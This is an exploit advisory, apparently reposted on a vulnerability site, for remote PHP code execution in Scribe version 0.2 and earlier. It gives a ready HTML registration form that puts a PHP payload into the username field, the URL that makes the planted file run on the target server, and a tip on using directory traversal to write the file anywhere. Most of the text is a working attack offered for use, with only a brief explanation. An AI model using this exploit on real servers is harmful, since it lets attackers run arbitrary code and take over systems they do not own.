--------------------------------------------------------------- Scribe <= 0.2 Remote PHP Code Execution Download: http://sourceforge.net/projects/scribe/ --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC: When we register a news user, scribe make a file called [username].php located in /regged/. The file contains: Username: [username] --------------------------------------------------------------- Exploit: <form id="Register" action="http://[target]/[scribe_path]/forum.php?act=7" method="post"> <input maxlength="99999999999" name="username" type="text" value="<script language=php>[YOUR_PHP_CODE]"><br> <input maxlength="32" name="password" type="password" value="kingolo"><br> <input maxlength="32" name="cpassword" type="password" value="kingolo"><br> <input maxlength="50" name="email" type="text" value="kingolo"><br> <input name="confirm" value="Make Shell!" type="submit"> </form> Now, go on: http://[target]/[scribe_path]/regged/<script language=php>[YOUR_PHP_CODE].php And your code will be execute on target server! --------------------------------------------------------------- Trick: If you insert directory traversal variable in your username, u can save the file where u want ;) ---------------------------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论